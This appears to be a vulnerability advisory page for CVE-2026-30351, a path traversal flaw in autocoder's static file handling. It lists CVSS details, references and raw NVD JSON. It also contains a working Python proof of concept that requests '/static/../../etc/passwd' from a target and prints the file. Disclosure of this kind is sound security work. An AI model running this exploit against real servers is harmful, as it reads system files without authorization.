CVE-2026-30351

Description

A path traversal vulnerability in the UI/static component of leonvanzyl autocoder commit 79d02a allows attackers to read arbitrary files via sending crafted URL path containing traversal sequences.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

leonvanzyl autocoder commit 79d02a

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_poc(target_url):
    # The vulnerable endpoint is in the UI/static component
    # Using '../' to traverse out of the web root
    payload = "/static/../../etc/passwd"
    
    full_url = f"{target_url}{payload}"
    
    try:
        response = requests.get(full_url, timeout=10)
        
        # Check if the response indicates successful file read
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Vulnerability Exploited Successfully!")
            print("[+] File Content:")
            print(response.text)
        else:
            print("[-] Exploit failed or target not vulnerable.")
            print(f"Status Code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8000" # Replace with actual target
    exploit_poc(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30351
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30351
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30351/
[4] VulDB https://vuldb.com/cve/CVE-2026-30351
[5] https://gist.github.com/syphonetic/0201da0fda7f700e0701d82d755d78a0
[6] https://github.com/leonvanzyl/autocoder

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30351", "sourceIdentifier": "[email protected]", "published": "2026-04-27T16:16:43.413", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability in the UI/static component of leonvanzyl autocoder commit 79d02a allows attackers to read arbitrary files via sending crafted URL path containing traversal sequences."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://gist.github.com/syphonetic/0201da0fda7f700e0701d82d755d78a0", "source": "[email protected]"}, {"url": "https://github.com/leonvanzyl/autocoder", "source": "[email protected]"}]}}